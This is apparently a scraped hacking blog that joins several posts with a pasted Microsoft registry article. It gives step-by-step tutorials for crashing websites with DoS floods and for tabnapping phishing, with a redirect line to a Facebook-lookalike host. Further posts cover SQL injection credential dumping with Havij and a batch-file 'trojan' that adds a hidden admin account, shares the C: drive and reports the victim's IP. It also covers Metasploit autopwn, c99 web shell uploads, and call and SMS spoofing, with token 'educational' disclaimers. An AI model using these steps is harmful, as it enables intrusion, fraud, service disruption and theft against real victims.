STING IT

DOWNLOAD HERE:
http://www.mediafire.com/download.php?unujzogm3jd
http://users.telenet.be/ahmadi/nettools.htm

This program also called Powertools, becouse its a great program with lots of hacks but also other handy tools like: .bat to .exe / Tr4nsl4t3 / password protection / and things like that!

1) IP Address Scanner
2) IP Calculator
3) IP Converter
4) Port Listener
5) Port Scanner
6) Ping
7) NetStat (2 ways)
8) Trace Route (2 ways)
9) TCP/IP Configuration
10) Online - Offline Checker
11) Resolve Host & IP
12) Time Sync
13) Whois & MX Lookup
14) Connect0r
15) Connection Analysator and protector
16) Net Sender
17) E-mail seeker
18) Net Pager
19) Active and Passive port scanner
20) Spoofer
21) Hack Trapper
22) HTTP flooder (DoS)
23) Mass Website Visiter
24) Advanced Port Scanner
25) Trojan Hunter (Multi IP)
26) Port Connecter Tool
27) Advanced Spoofer
28) Advanced Anonymous E-mailer
29) Simple Anonymous E-mailer
30) Anonymous E-mailer with Attachment Support
31) Mass E-mailer
32) E-mail Bomber
33) E-mail Spoofer
34) Simple Port Scanner (fast)
35) Advanced Netstat Monitoring
36) X Pinger
37) Web Page Scanner
38) Fast Port Scanner
39) Deep Port Scanner
40) Fastest Host Scanner (UDP)
41) Get Header
42) Open Port Scanner
43) Multi Port Scanner
44) HTTP scanner (Open port 80 subnet scanner)
45) Multi Ping for Cisco Routers
46) TCP Packet Sniffer
47) UDP flooder
48) Resolve and Ping
49) Multi IP ping
50) File Dependency Sniffer
51) EXE-joiner (bind 2 files)
52) Encrypter
53) Advanced Encryption
54) File Difference Engine
55) File Comparasion
56) Mass File Renamer
57) Add Bytes to EXE
58) Variable Encryption
59) Simple File Encryption
60) ASCII to Binary (and Binary to ASCII)
61) Enigma
62) Password Unmasker
63) Credit Card Number Validate and Generate
64) Create Local HTTP Server
65) eXtreme UDP Flooder
66) Web Server Scanner
67) Force Reboot
68) Webpage Info Seeker
69) Bouncer
70) Advanced Packet Sniffer
71) IRC server creater
72) Connection Tester
73) Fake Mail Sender
74) Bandwidth Monitor
75) Remote Desktop Protocol Scanner
76) MX Query
77) Messenger Packet Sniffer
78) API Spy
79) DHCP Restart
80) File Merger
81) E-mail Extractor (crawler / harvester bot)
82) Open FTP Scanner
83) Advanced System Locker
84) Advanced System Information
85) CPU Monitor
86) Windows Startup Manager
87) Process Checker
88) IP String Collecter
89) Mass Auto-Emailer (Database mailer; Spammer)
90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
91) Fishing Port Scanner (with named ports)
92) Mouse Record / Play Automation (Macro Tool)
93) Internet / LAN Messenger Chat (Server + Client)
94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
95) Hash MD5 Checker
96) Port Connect - Listen tool
97) Internet MAC Address Scanner (Multiple IP)
98) Connection Manager / Monitor
99) Direct Peer Connecter (Send/Receive files + chat)
100) Force Application Termination (against Viruses and Spyware)
101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
102) COM Detect and Test
103) Create Virtual Drives
104) URL Encoder
105) WEP/WPA Key Generator
106) Sniffer.NET
107) File Shredder
108) Local Access Enumerater
109) Steganographer (Art of hiding secret data in pictures)
110) Subnet Calculater
111) Domain to IP (DNS)
112) Get SNMP Variables
113) Internet Explorer Password Revealer
114) Advanced Multi Port Scanner
115) Port Identification List (+port scanner)
116) Get Quick Net Info
117) Get Remote MAC Address
118) Share Add
119) Net Wanderer
120) WhoIs Console
121) Cookies Analyser
122) Hide Secret Data In Files
123) Packet Generator
124) Secure File Splitting
125) My File Protection (Password Protect Files, File Injections)
126) Dynamic Switch Port Mapper
127) Internet Logger (Log URL)
128) Get Whois Servers
129) File Split&Merge
130) Hide Drive
131) Extract E-mails from Documents
132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
133) Hook Spy
134) Software Uninstaller
135) Tweak & Clean XP
136) Steganographic Random Byte Encryption
137) NetTools Notepad (encrypt your sensitive data)
138) File Encrypter/Decrypter
139) Quick Proxy Server
140) Connection Redirector (HTTP, IRC, ... All protocols supported)
141) Local E-mail Extractor
142) Recursive E-mail Extractor
143) Outlook Express E-mail Extractor
144) Telnet Client
145) Fast Ip Catcher
146) Monitor Host IP
147) FreeMAC (MAC Address Editor)
148) QuickFTP Server (+user accounts support)
149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
150) Network Protocol Analyzer
151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
152) WebMirror (Website Ripper)
153) GeoLocate IP
154) Google PageRank Calculator
155) Google Link Crawler (Web Result Grabber)
156) Network Adapter Binder
157) Remote LAN PC Lister
158) Fast Sinusoidal Encryption
159) Software Scanner
160) Fast FTP Client
161) Network Traffic Analysis
162) Network Traffic Visualiser
163) Internet Protocol Scanner
164) Net Meter (Bandwidth Traffic Meter)
165) Net Configuration Switcher
166) Advanced System Hardware Info
167) Live System Information
168) Network Profiler
169) Network Browser
170) Quick Website Maker and Web Gallery Creator
171) Remote PC Shutdown
172) Serial Port Terminal
173) Standard Encryptor
174) Tray Minimizer
175) Extra Tools (nmap console & win32 version)

HOW TO CRASH SMALL WEBSITES USING RDOS OR DDOS - COMPLETE TUTORIAL

TOOLS REQUIRED:

Port Scanner
rDos

Step One: First we need to find the websites IP Adress. This is very easy todo.

Ok so say they URL is http://www.yoursite.com ok now that you have your URL open Up Cmd todo this press Start>Run>cmd Once you have CMD open you type ping http://www.yoursite.com press enter and you will get the ip of the website. (YOU MUST REMOVE HTTP:// AND ANY /'s).

EXAMPLE:

Step Two: Now we must test to see if port 80 is open (it usually is).

This is very easy todo to Ok open up the port scanner you downloaded.
Once in the port scanner type in your Victims ip that you got from step 1.
It will ask you to do a range scan or a full scan (SELECT REANGE SCAN!) It will ask for conformaition you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y.

[X] = Closed
[X] Vulnerable = Open

Step Three:
The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is open your on your way to crashing!!

Ok open Up rDos that you download.
Enter the ip that we got from step 1.
It will ask you for the port to attack use port 80 that is why we scaned to make sure 80 was open! If it is closed it will not work.
Hit enter.. *= Flooding -=Crashed Or didn't connect!

EXAMPLE:

The site won't be directly offline!!
it starts with ***********
be patiend.. after some time it will go like this: **********-----------

This means the site crashed.

A DESCRIPTION OF THE REGISTRY

Description of the registry
The Microsoft Computer Dictionary, Fifth Edition, defines the registry as:
A central hierarchical database used in Microsoft Windows 98, Windows CE, Windows NT, and Windows 2000 used to store information that is necessary to configure the system for one or more users, applications and hardware devices.

The Registry contains information that Windows continually references during operation, such as profiles for each user, the applications installed on the computer and the types of documents that each can create, property sheet settings for folders and application icons, what hardware exists on the system, and the ports that are being used.

The Registry replaces most of the text-based .ini files that are used in Windows 3.x and MS-DOS configuration files, such as the Autoexec.bat and Config.sys. Although the Registry is common to several Windows operating systems, there are some differences among them.
A registry hive is a group of keys, subkeys, and values in the registry that has a set of supporting files that contain backups of its data. The supporting files for all hives except HKEY_CURRENT_USER are in the %SystemRoot%\System32\Config folder on Windows NT 4.0, Windows 2000, Windows XP, Windows Server 2003, and Windows Vista. The supporting files for HKEY_CURRENT_USER are in the %SystemRoot%\Profiles\Username folder. The file name extensions of the files in these folders indicate the type of data that they contain. Also, the lack of an extension may sometimes indicate the type of data that they contain.
Registry hive Supporting files
HKEY_LOCAL_MACHINE\SAM Sam, Sam.log, Sam.sav
HKEY_LOCAL_MACHINE\Security Security, Security.log, Security.sav
HKEY_LOCAL_MACHINE\Software Software, Software.log, Software.sav
HKEY_LOCAL_MACHINE\System System, System.alt, System.log, System.sav
HKEY_CURRENT_CONFIG System, System.alt, System.log, System.sav, Ntuser.dat, Ntuser.dat.log
HKEY_USERS\DEFAULT Default, Default.log, Default.sav

In Windows 98, the registry files are named User.dat and System.dat. In Windows Millennium Edition, the registry files are named Classes.dat, User.dat, and System.dat.

Note Security features in Windows NT, Windows 2000, Windows XP, Windows Server 2003, and Windows Vista let an administrator control access to registry keys.

The following table lists the predefined keys that are used by the system. The maximum size of a key name is 255 characters.
Folder/predefined key Description
HKEY_CURRENT_USER Contains the root of the configuration information for the user who is currently logged on. The user's folders, screen colors, and Control Panel settings are stored here. This information is associated with the user's profile. This key is sometimes abbreviated as "HKCU."
HKEY_USERS Contains all the actively loaded user profiles on the computer. HKEY_CURRENT_USER is a subkey of HKEY_USERS. HKEY_USERS is sometimes abbreviated as "HKU."
HKEY_LOCAL_MACHINE Contains configuration information particular to the computer (for any user). This key is sometimes abbreviated as "HKLM."
HKEY_CLASSES_ROOT Is a subkey of HKEY_LOCAL_MACHINE\Software. The information that is stored here makes sure that the correct program opens when you open a file by using Windows Explorer. This key is sometimes abbreviated as "HKCR." Starting with Windows 2000, this information is stored under both the HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER keys. The HKEY_LOCAL_MACHINE\Software\Classes key contains default settings that can apply to all users on the local computer. The HKEY_CURRENT_USER\Software\Classes key contains settings that override the default settings and apply only to the interactive user. The HKEY_CLASSES_ROOT key provides a view of the registry that merges the information from these two sources. HKEY_CLASSES_ROOT also provides this merged view for programs that are designed for earlier versions of Windows. To change the settings for the interactive user, changes must be made under HKEY_CURRENT_USER\Software\Classes instead of under HKEY_CLASSES_ROOT. To change the default settings, changes must be made under HKEY_LOCAL_MACHINE\Software\Classes. If you write keys to a key under HKEY_CLASSES_ROOT, the system stores the information under HKEY_LOCAL_MACHINE\Software\Classes. If you write values to a key under HKEY_CLASSES_ROOT, and the key already exists under HKEY_CURRENT_USER\Software\Classes, the system will store the information there instead of under HKEY_LOCAL_MACHINE\Software\Classes.
HKEY_CURRENT_CONFIG Contains information about the hardware profile that is used by the local computer at system startup.
Note The registry in 64-bit versions of Windows XP, Windows Server 2003, and Windows Vista is divided into 32-bit and 64-bit keys. Many of the 32-bit keys have the same names as their 64-bit counterparts, and vice versa. The default 64-bit version of Registry Editor that is included with 64-bit versions of Windows XP, Windows Server 2003, and Windows Vista displays the 32-bit keys under the following node:
HKEY_LOCAL_MACHINE\Software\WOW6432Node
For more information about how to view the registry on 64-Bit versions of Windows, click the following article number to view the article in the Microsoft Knowledge Base:
305097 How to view the system registry by using 64-bit versions of Windows

The following table lists the data types that are currently defined and that are used by Windows. The maximum size of a value name is as follows:
• Windows Server 2003, Windows XP, and Windows Vista: 16,383 characters
• Windows 2000: 260 ANSI characters or 16,383 Unicode characters
• Windows Millennium Edition/Windows 98/Windows 95: 255 characters
Long values (more than 2,048 bytes) must be stored as files with the file names stored in the registry. This helps the registry perform efficiently. The maximum size of a value is as follows:
• Windows NT 4.0/Windows 2000/Windows XP/Windows Server 2003/Windows Vista: Available memory
• Windows Millennium Edition/Windows 98/Windows 95: 16,300 bytes
Note There is a 64K limit for the total size of all values of a key.
Name Data type Description
Binary Value REG_BINARY Raw binary data. Most hardware component information is stored as binary data and is displayed in Registry Editor in hexadecimal format.
DWORD Value REG_DWORD Data represented by a number that is 4 bytes long (a 32-bit integer). Many parameters for device drivers and services are this type and are displayed in Registry Editor in binary, hexadecimal, or decimal format. Related values are DWORD_LITTLE_ENDIAN (least significant byte is at the lowest address) and REG_DWORD_BIG_ENDIAN (least significant byte is at the highest address).
Expandable String Value REG_EXPAND_SZ A variable-length data string. This data type includes variables that are resolved when a program or service uses the data.
Multi-String Value REG_MULTI_SZ A multiple string. Values that contain lists or multiple values in a form that people can read are generally this type. Entries are separated by spaces, commas, or other marks.
String Value REG_SZ A fixed-length text string.
Binary Value REG_RESOURCE_LIST A series of nested arrays that is designed to store a resource list that is used by a hardware device driver or one of the physical devices it controls. This data is detected and written in the \ResourceMap tree by the system and is displayed in Registry Editor in hexadecimal format as a Binary Value.
Binary Value REG_RESOURCE_REQUIREMENTS_LIST A series of nested arrays that is designed to store a device driver's list of possible hardware resources the driver or one of the physical devices it controls can use. The system writes a subset of this list in the \ResourceMap tree. This data is detected by the system and is displayed in Registry Editor in hexadecimal format as a Binary Value.
Binary Value REG_FULL_RESOURCE_DESCRIPTOR A series of nested arrays that is designed to store a resource list that is used by a physical hardware device. This data is detected and written in the \HardwareDescription tree by the system and is displayed in Registry Editor in hexadecimal format as a Binary Value.
None REG_NONE Data without any particular type. This data is written to the registry by the system or applications and is displayed in Registry Editor in hexadecimal format as a Binary Value
Link REG_LINK A Unicode string naming a symbolic link.
QWORD Value REG_QWORD Data represented by a number that is a 64-bit integer. This data is displayed in Registry Editor as a Binary Value and was introduced in Windows 2000.

Back to the top
Back up the registry
Before you edit the registry, export the keys in the registry that you plan to edit, or back up the whole registry. If a problem occurs, you can then follow the steps in the "Restore the registry" section to restore the registry to its previous state. To back up the whole registry, use the Backup utility to back up the system state. The system state includes the registry, the COM+ Class Registration Database, and your boot files. For more information about how to use the Backup utility to back up the system state, click the following article numbers to view the articles in the Microsoft Knowledge Base:
308422 How to use the Backup utility that is included in Windows XP to back up files and folders
320820 How to use the Backup utility to back up files and folders in Windows XP Home Edition
326216 How to use the backup feature to back up and restore data in Windows Server 2003
Back to the top
Edit the registry
To modify registry data, a program must use the registry functions that are defined in the following MSDN Web site:
http://msdn2.microsoft.com/en-us/library/ms724875.aspx
Administrators can modify the registry by using Registry Editor (Regedit.exe or Regedt32.exe), Group Policy, System Policy, Registry (.reg) files, or by running scripts such as VisualBasic script files.
Use the Windows user interface
We recommend that you use the Windows user interface to change your system settings instead of manually editing the registry. However, editing the registry may sometimes be the best method to resolve a product issue. If the issue is documented in the Microsoft Knowledge Base, an article with step-by-step instructions to edit the registry for that issue will be available. We recommend that you follow those instructions exactly.
Use Registry Editor
Warning Serious problems might occur if you modify the registry incorrectly by using Registry Editor or by using another method. These problems might require that you reinstall the operating system. Microsoft cannot guarantee that these problems can be solved. Modify the registry at your own risk.
You can use Registry Editor to do the following:
• Locate a subtree, key, subkey, or value
• Add a subkey or a value
• Change a value
• Delete a subkey or a value
• Rename a subkey or a value
The navigation area of Registry Editor displays folders. Each folder represents a predefined key on the local computer. When you access the registry of a remote computer, only two predefined keys appear: HKEY_USERS and HKEY_LOCAL_MACHINE.
Use Group Policy
Microsoft Management Console (MMC) hosts administrative tools that you can use to administer networks, computers, services, and other system components. The Group Policy MMC snap-in lets administrators define policy settings that are applied to computers or users. You can implement Group Policy on local computers by using the local Group Policy MMC snap-in, Gpedit.msc. You can implement Group Policy in Active Directory by using the Active Directory Users and Computers MMC snap-in. For more information about how to use Group Policy, see the Help topics in the appropriate Group Policy MMC snap-in.
Use a Registration Entries (.reg) file
Create a Registration Entries (.reg) file that contains the registry changes, and then run the .reg file on the computer where you want to make the changes. You can run the .reg file manually or by using a logon script. For more information, click the following article number to view the article in the Microsoft Knowledge Base:
310516 How to add, modify, or delete registry subkeys and values by using a Registration Entries (.reg) file

Saturday, May 28, 2011

TAB NAPPING - ADVANCED METHOD OF PHISHING WITH HELP OF A REDIRECTING JAVASCRIPT - COMPLETE TUTORIAL

Tab napping is new type of phishing scam that does not require you to click on any url to redirect you to the phishing site instead it relies on the fact that a lot of people used tabbed browsing(Opening multiple tabs while browsing).In tab napping one of your inactive tab is automatically replaced by with a new tab without your knowledge. Tab Napping is a type of phishing with smarter way to confuse the victim.For example Victim was viewing page A in a tab of a browser and then left this idle and now using some other website in another tab of browser. After some time the page A will automatically change to the phishing page. This is your phishing page. Idea is to confuse the victim in multiple tabs of browser.

Now lets move on to the tutorial:

1. First we need a simple phishing setup that we have discussed before u can get ur phisher from here: click here

2. U will need ur hosting/blog/aur any webpage in which u can put the java script to sent its link to victim.

3. Get ur java script frm here.

4. Now u replace the link with your phishing page link in the java script from this line which comes in two places in the script

timerRedirect = setInterval("location.href='http://facb00kloagin.my3gb.com/index.html'",10000); //set timed redirect

5. After replacing it Now, Select all & Copy Tab Napping script and you need to paste this code at the end of the real page html code(means above </html> ).

6. This script will not make any change on ur web page or blog page.

This script will track the user actions and as soon as the blog will kept ideal ,

That script will redirect the victim to the phishing page your derived.
Now send this blog address to your victim or u can upload ur malicous webpage on a web hosting & then send the link to victim.

7. Now for more betterment u can shorten ur url so that victim wont be able to know ur intentions get any url shortner from here

HERE IS A DEMO OF TABNAPPING PAGE:

Just Go HERE and wait keep yourself idle for 10 sec. U will be redirected to my phishing page.

Note: This is illegal and is for educational purpose only. Any loss/damage happening will not be in any way our responsibility.

Friday, May 27, 2011

HOW TO APPLY SQL INJECTION THROUGH HAVJI V1.14

1.First Find a sql infected site (website vulnerable for injection)
2-Open havij and copy and paste infected link as shown in figure

3. Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx

[Image: thirdk.jpg]

4.Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed

[Image: 37846594.jpg]

5. After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure

[Image: 4tgh.jpg]

6. In that Just put mark username and password and click "Get data"

[Image: 5tht.jpg]

8. Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure...

[Image: srfile201088142733796.jpg]

Download havij v1.14 from here: http://www.itsecteam.com/files/havij/Havij1.14Free.rar

BUILD YOUR OWN SERVER TROJAN FILE (.BAT) - REMOTE ADMIN - HACKING WITHOUT ANY TOOL

Pen a dos prompt we will only need a dos prompt, and windows xp…

Basics

Opening a dos prompt -> Go to start and then execute and write
cmd and press ok

Now insert this command: net
And you will get something like this

Ok in this tutorial we well use 3 of the commands listed here
they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?
Bat file is a piece of text that windows will execute as commands.
Open notepad and whrite there:

dir
pause

And now save this as test.bat and execute it.
Funny aint it ?

Starting

Server

The plan here is to share the C: drive and make a new user
with administrators access

Step one -> Open a dos prompt and a notebook
The dos prompt will help you to test if the commands are ok
and the notebook will be used to make the .bat file.

Command n 1-> net user neo /add
What does this do? It makes a new user called neo you can put
any name you whant

Command n 2-> net localgroup administrators neo /add
This is the command that make your user go to the administrators
group.
Depending on the windows version the name will be different.
If you got an american version the name for the group is Administrators
and for the portuguese version is administradores so it’s nice
yo know wich version of windows xp you are going to try share.

Command n 3->net share system=C:\ /unlimited
This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your
.bat file and send to your friend.

Extras

Command n 4-> net send urip I am ur server
Where it says urip you will insert your ip and when the victim
opens the .bat it will send a message to your computer
and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

Client

Now that your friend opened your .bat file her system have the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command , you will execute these commands from your
dos prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim
Of course where it says victimip you will insert the victim ip.
Command n 2-> explorer \\victimip\system
And this will open a explorer windows in the share system wich is
the C: drive with administrators access!

HOW TO HACK ANY COMPUTER THROUGH METASPLOIT USING HIS IP ADDRESS

Hello everybody! I am here to show you this magical tool called Metasploit that allows you to hack ANYunpatched computer with only it's IP. Lets begin...

1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

2.) You need PostgrSQL for your database. Download here: http://www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work!

3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...

[Image: pgadmin.bmp]

4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:

[Image: metasploit.bmp]

5.)Now, in the window type:

db_connect postgres:ThePassYouChose@localhost:5432

The first time you do this you will see lots of text flash buy. Don't wory, this is normal.

6.)Type db_host to make sure you are connected correctally.

7.)Now type this:

db_nmap 000.000.000.000

Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

7.) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...

8.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

9.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

sessions -i ExploitNumber

___________________________________________________________

The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.

CALL SPOOFING 2011

Call spoofing is a technique to call anyone from any number. You can call your friend from his/her Dad’s number if we consider it as a example. Here is a technique that mostly being used to spoof a call. Just follow the following steps:

1. Open http://www.crazycall.net
2. Select your country and wait for the page to load.
3. Enter the number you want to display in the first big box (Don’t change the contents of small box if the fake number is of same country).
4. Enter the number you wish to call in second big box.
5. Choose voice pitch as normal (for same voice) or high or low pitch to change your voice.
6. Click Get me a code.
7. Dial the number shown on right and enter the shown code when asked.

Note:-Please Remember International call rates apply. and yes the post is just for educationpurpose only that how call spoofing can be performed.I appeal my users to not to misuse the given information.

SEND FREE SMS FROM ANY FRIEND'S NUMBER TO ANY NUMBER IN THE WORLD - SMS SPOOFING

1. First of all, register here . This website looks like this . Fill as i shown below:

2. After Registering you will get 25 free credits that means you can send 25 free SMS from any number to any number. For using it again register another mobile and email ID. 25 SMS is the limitation of this trick from one registered number.. Usually people have two to three sims.

3. Now after registering you will receive password on registered mobile number.

4. Now login with that password that you got on mobile.

5. Now go to Send SMS to number . As shown in snapshot below:

6. After entering the details as explained in snapshot above. Click on send.

7. That's all the hack. I know its limited but its awesome...Isn't It..

HOW TO HACK A WEBSITE USING SQL MAP - AUTOMATIC SQL INJECTION TOOL

Today i am going to write a sql injection tool. It's V 0.9 is just released. There are many changes in this tool from it's previous version. Sql injection is one of the top web application vulnerabilities. It's very important to check a website against this vulnerability.
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Download Here:
http://sourceforge.net/projects/sqlmap/files/

HOW TO HACK A WEBSITE USING C99 SCRIPT

The c99 shell script is a very good way to hack a php enable web server. You have to find an unsecure uploader to upload this file to the server. Here i used unsecure uploader means the uploader which can't check for file extension and allow us to upload our executable scripts to the server.

This c99 shell allows an attacker to hijack the php enable web server. This script is very user friendly and having very good interface so it is easy to use. You can issue any php command to run on the web server. You can use any of the commands given in the script to run on the web server.

NOTE: This post is only for educational purpose. We advice you not to try this on any website. Use of this script on any website is illegal.

For hacking a website using C99 script follow these steps.

1) Find a php web site with an uploader.
2) Test the file uploader to be secure or not by uploading files with a server executable extension.
3) If uploader is unsecure then upload the shell script.
4) Execute the uploaded code by navigating to the uploaded page.
5) A c99 script GUI will show up with a lot of options and details.
6) Look for the server details if the safe mode is on or off. If safe mode is off then the entire web server can be controlled by the script. If its on then on the directory in which c99 shell script is uploaded can only be controlled by the script.
7) Apart from being able to chmod, modify and delete files c99 also lets its user brute force the ftp but it requires an additional dictionary file which can run into hundreds of MBs.

NOTE: You can also execute this script on the web server by RFI

Search the and download the script from google. or download from link
c99
but upper link may not work because script will soon be deleted by the file host.

WI-FI SCANNING & HACKING TOOLS

Guys you must know everything that's why i am explaining each and everything in this tutorials related to wireless networks or wifi hacking. Its a complete wireless network hacking tutorial with allhacking tools and how to use them. Using these you will came to know how to hack wifi or wireless networks and note guys this tutorial is 110% working like other one's.

Note: This article is only for Educational Purposes so that you can understand the loopholes in wireless networks and fix them. Any misuse can result in disastrous consequences like cyber crime.

Don't worry everything is ethical till you misuses it. So always try to be ethical as far as possible. Lets start from the first topic...

1. WIRELESS SCANNING TOOLS

Scanning tools is needed to scan the wifi or wireless networks around you. First of all we need to scan all the wireless networks so that we can select the wireless network to hack. There are several wireless scanning tools but my favorite is NET STUMBLER. And for Mac operating systems is MacStumbler.

There are several Wireless scanning tools, a list of all wireless scanning tools is given below:

a. NetStumbler for Windows operating systems.

NetStumbler (also known as Network Stumbler) is a tool for Windows that facilitates detection of Wireless LANs using the 802.11b, 802.11a and 802.11g WLAN standards. It runs on Microsoft Windows 98 and above. A trimmed-down version called MiniStumbler is available for Windows CE.

NetStumbler is commonly used for:

Wardriving
Verifying network configurations
Finding locations with poor coverage in one’s WLAN
Detecting causes of wireless interference
Detecting unauthorized (”rogue”) access points
Aiming directional antennas for long-haul WLAN links

DOWNLOAD:http://www.netstumbler.com/downloads/

b. MacStumbler for Mac operating systems.

MacStumbler is a small utility to emulate the functionality of projects like netstumbler, bsd-airtools, and kismet. It's meant purely for educational or auditing purposes, although many people enjoy using these types of programs to check out how many WiFi (wireless) networks are in their area, usually known as "war driving".

MacStumbler only works with AirPort wireless cards, it does not (yet) work with any PCMCIA or USB wireless devices.

DOWNLOAD:http://www.macupdate.com/app/mac/8035/macstumbler

c. Kismet for Windows and Linux.

Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and infering the presence of nonbeaconing networks via data traffic. Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.

DOWNLOAD:http://www.kismetwireless.net/download.shtml

d. Redfang 2.5

Redfang is an application that finds non-discoverable Bluetooth devices by brute-forcing the last six bytes of the device's Bluetooth address and doing a read_remote_name().

http://www.hacker-soft.net/Soft/Soft_4399.htm

DOWNLOAD:http://www.securiteam.com/tools/5JP0I1FAAE.html

e. THC-WarDrive

THC-WarDrive is a tool for mapping your city for wavelan networks with a GPS device while you are driving a car or walking through the streets. THC-WarDrive is effective and flexible, a "must-download" for all wavelan nerds.

DOWNLOAD:http://linux.wareseeker.com/System/thc-wardrive-2.3.zip/334584

f. PrismStumbler

Prismstumbler is software which finds 802.11 (WLAN) networks. It comes with an easy to use GTK2 frontend and is small enough to fit on a small portable system. It is designed to be a flexible tool to find as much information about wireless LANinstallations as possible. Because of its client-server architecture the scanner engine may be used for different frontends.

DOWNLOAD: http://www.monolith81.de/mirrors/?path=prismstumbler/

g. Mognet

Mognet is a free, open source wireless ethernet sniffer/analyzer written in Java. It is licensed under the GNU General Public License. It was designed with handheld devices like the iPaq in mind, but will run just as well on a desktop or laptop to find wireless networks.

DOWNLOAD: http://www.monolith81.de/mirrors/?path=mognet/

h. WaveStumbler

WaveStumbler is console based 802.11 network mapper for Linux. It reports the basic AP stuff like channel, WEP, ESSID, MAC etc. It has support for Hermes based cards (Compaq, Lucent/Agere, … ) It still in development but tends to be stable. It consist of a patch against the kernel driver, orinoco.c which makes it possible to send the scan command to the driver viathe /proc/hermes/ethX/cmds file. The answer is then sent back via a netlink socket. WaveStumbler listens to this socket and displays the output data on the console.

DOWNLOAD: http://www.monolith81.de/mirrors/?path=wavestumbler/

i. StumbVerter

StumbVerter is a standalone application which allows you to import Network Stumbler's summary files into Microsoft's MapPoint 2002 maps. The logged WAPs will be shown with small icons, their colour and shape relating to WEP mode and signal strength.

DOWNLOAD:http://www.monolith81.de/mirrors/?path=stumbverter/

j. AP Scanner

Wireless Access Point Utilites for Unix - it's a set of utilites to configure and monitor Wireless Access Points under Unix using SNMP protocol. Utilites knownly compiles and run under Linux, FreeBSD, NetBSD and AIX.

DOWNLOAD: http://www.monolith81.de/mirrors/?path=ap-utils/

k. SSID Sniff

SSIDsniff is a nifty tool to use when looking to discover access points and save captured traffic. Comes with a configure script and supports Cisco Aironet and random prism2 based cards.

DOWNLOAD:http://www.monolith81.de/mirrors/index.php?path=ssidsniff/

l. Wavemon

Wavemon is a ncurses based application forwireless hardware. It`s running currently under Linux with cards witch supported by Jean Tourrilhes wireless extensions. You will find them in the Kernel 2.4. I used this tool a few times, it`s small, works, opensource and good.

DOWNLOAD:http://www.monolith81.de/mirrors/?path=wavemon/

m. Wireless Security Auditor

Wireless Security Auditor allows network administrators to verify how secure a company’s wireless network is by executing an audit of accessible wireless networks. Featuring patent-pending cost-efficient GPU acceleration technologies, Elcomsoft Wireless Security Auditor attempts to recover the original WPA/WPA2 -PSK text passwords in order to test how secure your wireless environment is.

DOWNLOAD:http://hotfile.com/dl/89005301/7bc0334/EWSA_v3.0.3.382.rar.html

n. AirTraf

AirTraf 1.0 is a wireless sniffer that can detect and determine exactly what is being transmitted over 802.11 wireless networks. This open-source program tracks and identifies legitimate and rogue access points, keeps performance statistics on a by-user and by-protocol basis, measures the signal strength of network components, and more.

DOWNLOAD:http://www.elixar.com/corporate/history/airtraf-1.0/airtraf_download.php

o. AirMagnet

AirMagnet WiFi Analyzer is the industry "de-facto" tool for mobile auditing and troubleshooting enterprise Wi-Fi networks. AirMagnet WiFi Analyzer helps IT staff quickly solve end user issues while automatically detecting network security threats and other wireless network vulnerabilities.

DOWNLOAD:http://www.airmagnet.com/products/wifi_analyzer/

Ammar

Pages

Tuesday, May 31, 2011

ALL IN ONE BEST HACKING TOOLS PACK FOR BEGINNERS - DOWNLOAD

NETTOOLS - AWESOME PACKAGE OF CRAZY HACKING TOOLS - DOWNLOAD